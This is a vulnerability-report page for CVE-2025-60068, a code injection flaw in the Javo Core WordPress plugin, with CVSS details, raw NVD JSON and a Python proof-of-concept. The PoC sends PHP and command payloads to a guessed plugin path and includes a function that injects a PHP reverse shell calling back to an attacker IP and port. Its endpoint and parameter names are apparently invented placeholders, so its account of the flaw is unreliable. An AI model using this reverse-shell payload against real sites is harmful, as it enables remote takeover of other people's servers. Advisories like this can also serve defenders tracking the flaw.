Security Vulnerability Report
中文
CVE-2025-60068 CVSS 6.5 MEDIUM

CVE-2025-60068

Published: 2025-12-18 08:16:07
Last Modified: 2026-04-27 18:16:23

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in javothemes Javo Core javo-core allows Code Injection.This issue affects Javo Core: from n/a through <= 3.0.0.266.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Javo Core (javo-core) <= 3.0.0.266

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60068 PoC - Javo Core Code Injection # Note: This is a conceptual PoC for demonstration purposes import requests import sys def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-60068""" # Target endpoint - specific path depends on plugin configuration vulnerable_endpoint = f"{target_url}/wp-content/plugins/javo-core/" # Malicious payload - code injection attempt # In real attack, attacker would inject PHP code payload = { 'javo_action': 'some_action', 'javo_param': '<?php phpinfo(); ?>', # Example injection 'cmd': 'whoami' # Command injection attempt } try: # Send request with malicious payload response = requests.post(vulnerable_endpoint, data=payload, timeout=10) # Check for indicators of successful injection if 'phpinfo' in response.text or 'Linux' in response.text: print(f"[+] Target appears VULNERABLE to CVE-2025-60068") print(f"[+] Injected code executed successfully") return True else: print(f"[-] Target may not be vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def exploit_code_injection(target_url, attacker_ip, attacker_port): """Exploit code injection to gain shell access""" # Reverse shell payload shell_payload = f""" <?php $sock=fsockopen(\"{attacker_ip}\",{attacker_port}); $proc=proc_open(\"sh\",array(0=>$sock,1=>$sock,2=>$sock),$pipes); proc_close($proc); ?> """ # Encode payload for injection encoded_payload = shell_payload.replace('\n', '').replace(' ', '%20') exploit_data = { 'javo_action': 'process', 'code': encoded_payload } vulnerable_endpoint = f"{target_url}/wp-content/plugins/javo-core/" try: response = requests.post(vulnerable_endpoint, data=exploit_data, timeout=10) print(f"[+] Exploit sent - check your listener") return True except: return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-60068-poc.py <target_url>") sys.exit(1) target = sys.argv[1] print(f"[*] Testing {target} for CVE-2025-60068") check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60068", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:06.933", "lastModified": "2026-04-27T18:16:23.430", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in javothemes Javo Core javo-core allows Code Injection.This issue affects Javo Core: from n/a through <= 3.0.0.266."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/javo-core/vulnerability/wordpress-javo-core-plugin-3-0-0-266-arbitrary-code-execution-vulnerability?_s_id=cve", "source": "[email protected]"}]}}